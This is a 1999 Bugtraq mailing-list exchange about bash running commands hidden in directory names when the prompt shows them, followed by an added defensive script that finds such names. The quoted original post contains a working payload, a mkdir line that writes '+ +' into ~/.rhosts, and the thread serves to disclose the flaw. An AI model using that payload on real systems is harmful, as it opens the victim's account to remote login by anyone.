Date sent: Thu, 22 Apr 1999 01:39:48 +0100
Send reply to: Andy Church <achurchat_private>
From: Andy Church <achurchat_private>
Subject: Re: Bash Bug
Originally to: shadowat_private
To: BUGTRAQat_private

Hello together

> >Figured while everyone was working with bash, I might as well make this
> >one public (I apologize if this is old news, apparently it hasn't been fixed
> >if so).
> >
> >If a user creates a directory with a command like
> >
> >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "

Not bad !

> >
> >and someone cd's into said directory, either by accident, or whatever,
> >then it will cause it to actually execute.
>
> Just to clarify, this only happens if PS1 (the bash prompt) contains
> \w or \W _and_ a prompt is displayed containing the bogus directory name.
> This means unattended shell scripts are safe. As a workaround, use `pwd`
> in place of \w.

Sorry, with bash version 2.01.1 (supplied with SuSE5.3) it is just the
opposite of what you are clarifying. If one has \w or \W specified in PS1
to show the path, it does NOT happen and if `pwd` is specified instead of
\w or \W it DOES happen.

>
> Tested with bash 1.14 (it's the only one I have handy).
>
> --Andy Church
> achurchat_private
> http://achurch.dragonfire.net/

Kind regards
Phibus

-----------------------------------------------------------
Philip Rueegsegger         System Manager
Bruker AG                  Direct dial : +41-1-825 93 46
Industriestrasse 26        Telephone   : +41-1-825 91 11
CH-8117 Faellanden         Telefax     : +41-1-825 94 69
Switzerland                E-Mail      : philip.rueegseggerat_private
-----------------------------------------------------------
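
Added example, not part of the original thread or anyone's posted code: a defensive check that flags directory names containing backquotes or `$(`, the kind of name the messages above describe being evaluated when the prompt displays it. The function names and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread): flag directory names that embed
# shell command-substitution syntax, so they can be reviewed or renamed.

# Return 0 if the given name contains a backquote or "$(".
has_cmdsubst() {
    case "$1" in
        *'`'*|*'$('*) return 0 ;;
        *) return 1 ;;
    esac
}

# Print every directory under $1 whose own name contains such syntax.
# find does the pattern matching itself; no name is handed to a shell.
scan_dirs() {
    find "$1" -type d \( -name '*`*' -o -name '*$(*' \) -print
}

# Constructed sample tree: one harmless flagged name, one ordinary name.
# Prints the number of flagged directories found.
demo() {
    tmp=$(mktemp -d) || return 1
    mkdir "$tmp"/'reports`true`' "$tmp"/'plain-dir'
    count=$(scan_dirs "$tmp" | grep -c . || true)
    rm -rf "$tmp"
    echo "$count"
}
```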